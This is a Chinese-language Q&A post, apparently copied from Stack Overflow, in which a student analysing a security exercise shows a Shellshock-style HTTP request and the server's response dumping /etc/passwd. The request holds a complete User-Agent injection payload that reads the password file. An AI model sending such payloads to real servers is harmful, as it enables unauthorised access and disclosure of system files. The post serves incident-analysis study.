gpt4 book ai didi

linux - 了解来自 Linux 服务器的 HTTP 响应

转载 作者:太空宇宙 更新时间:2023-11-04 10:46:13 24 4
gpt4 key购买 nike

<分区>

我正在解决一个问题,涉及某人利用 Linux 服务器中的漏洞来访问它。问题的第一部分说明

监控关键的 Goldmine Tech Web 服务器和不受信任的外部 IP,Bob 从不受信任的 IP 发现以下 HTTP GET 请求:

GET /cgi-bin/status/status.cgi HTTP/1.1
Host: motherlode.goldminetech.edu
User-Agent: () { :;}; echo "PWNED by 0c007: “ $(</etc/passwd)

据我所知,shell 脚本注入(inject)被用作命令 $(</etc/passwd)被执行,使黑客能够访问此密码文件夹。然后,这里列出了一个 HTTP 响应:

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: length
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
paul:!:201:1::/home/paul:/usr/bin/ksh
jdoe:*:202:1:John Doe:/home/jdoe:/usr/bin/ksh

我应该确定黑客获得了哪些访问权限。这是我被困的地方,因为我无法破译这个回应。我环顾四周,找不到任何解释如何从 Linux 服务器读取 HTTP 响应的内容。任何帮助将不胜感激。

24 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com